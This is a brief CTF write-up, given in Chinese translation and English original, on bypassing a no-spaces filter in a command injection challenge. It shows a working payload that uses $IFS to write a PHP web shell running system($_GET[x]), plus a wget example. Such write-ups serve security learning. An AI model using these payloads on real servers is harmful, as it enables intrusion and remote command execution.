原文链接: http://0xa.li/executing-bash-commands-without-space/
大家好,我在一次CTF比赛中和我的队友@aboul3la发现一种在Web应用挑战中进行命令注入的方法.
如果你输入`>file.txt`服务器就会创建一个file.txt的文件
我们想要写入一个PHP的shell,像这样:
echo "<?PHP CODE>" > file.php
但是问题是,这个比赛的题目过滤空格,不让输入空格(Error: Not valid URL)
所以我们尝试很多种办法绕过,一开始的思路是使用解码的方式来获得一个space
(空格),比如从hex或者其他的什么解码成一个空格,但是这种方法在echo后面都不凑效
然后我就进行了搜索,看Linux是否自己已经对空格进行了定义.
最后我发现了,确实是$IFS
解决方法是:
echo\$IFS"<?=system(\$_GET[x]);?>">shell.php
如果你要下载东西,那么wget$IFShttps://google.com/robots.txt

英文原文:
Hello, world.
So I was in this CTF competition and my teammate (@aboul3la) found a command injection vulnerability in one of web application challenges.
If you input >file.txt
the server creates a file called file.txt.
We wanted to write a PHP shell to the server (echo “<?PHP CODE>” > file.php)
But the thing is, the challenge had a filter that won’t allow you to have a space in the input (Error: Not valid URL)
So we tried around and my first thought was to use some decoding mechanism to decrypt “space” from it’s hex equivalent or something, but we couldn’t do it without a space after the “echo”
Then i thought i should search and see if the space (or tab) is defined in Linux itself.
And i found it: $IFS.
The solution was:
echo$IFS”<?=system($_GET[x]);?>”>shell.php
If you wanted to wget something: wget$IFS”https://google.com/robots.txt”